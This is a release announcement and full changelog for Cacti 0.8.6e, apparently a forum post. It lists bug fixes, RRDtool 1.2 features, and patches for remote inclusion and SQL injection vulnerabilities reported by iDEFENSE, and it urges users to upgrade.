This version addresses two serious security issues pointed out by the iDEFENSE group, so it is recommended that all users upgrade. In summary, one of the security vulnerabilities is related to improperly validated input, while the other is a cross site scripting bug.
For 0.8.6d users who need the security fixes without an entirely new release, please see the 0.8.6d security patch.
Even though this release is focused on security, there are quite a few notable bug fixes and a few small features as well. In general the bug fixes are related to data sources, RRDtool 1.2 support, and the poller. It is worth noting that the bug introduced in 0.8.6d which caused graph gaps under certain conditions has been addressed. In the features department, there are a few enhancements related to RRDtool 1.2, numerous speedups in the UI, among others.
As always, be sure to read the release notes before upgrading. The complete changelog is below.
Code: Select all
-bug#0000143: Allow the user to enter 'U' for unknown minimum and maximum data source input values.
-bug#0000377: Fix logarithmic graph creation issues.
-bug#0000392: Implement caching to reduce the number of SQL queries needed to render the graph tree.
-bug#0000402/#0000457: Allow bounds to be set properly for logarithmic graph creation.
-bug#0000428: Unable to try login again after Access Denied.
-bug#0000450: Force strict checking for data query parsing to prevent numeric values from being incorrectly handled.
-bug#0000453: SPAN tag between each character of GraphTitle in Graph Management.
-bug#0000458: Generate and error message and exit poller.php if the cactid binary path is invalid.
-bug#0000463: Fix Syslog logging of poller statistics.
-bug#0000464: Remove dates from Syslog generated messages.
-bug#0000465: Allow for the mass resize of graphs.
-bug#0000471: Remove the graph 'Settings' tab if the user is not allowed to save graph settings.
-bug#0000478: Validate field input values on the Data Templates page. Prevent duplicate data template items from appearing as a result of this bug.
-bug#0000481: Add several checks to prevent PHP errors when parsing data query XML files.
-bug: Graph zoom feature had incorrect bounding box when using RRD 1.2.x
-bug: Speed the generation of the Tree View Dual Pane by caching the Tree to a local session variable.
-bug: Handle STACK graph items properly in RRDtool 1.2.
-bug: Prevent data query recaches if the device returns empty input.
-bug: Fix potential issues with graph gaps when using a large number of poller processes.
-bug: Fix issues when zooming with new RRDtool 1.2 title fonts with a point size other than 10
-bug: Fix issues when zooming outside of the select areas causing a broken graph
-bug: Fix issues experienced when users attempted to create custom graphs and thousands of data sources exist
-feature: Add ability to filter by host status as well as add ability to filter accross both description and hostname
-feature: Add additional options to control RRDtool 1.2 fonts.
-feature: Allow the user to Enable/Disable Data Sources from the user interface and automatically disable hosts when deleting a device.
-feature: Add Data Source information to the Cacti Log File to assist with troubleshooting.
-feature: Add html links to both hosts and data sources in the Cacti Log File.
-security: Fix several remote inclusion bugs that were exploitable when PHP's 'register_global' feature is turned on [IDEF0941], [IDEF1023], [IDEF1024].
-security: Fix several SQL injection bugs due to improper input validation [IDEF1001].
-Ian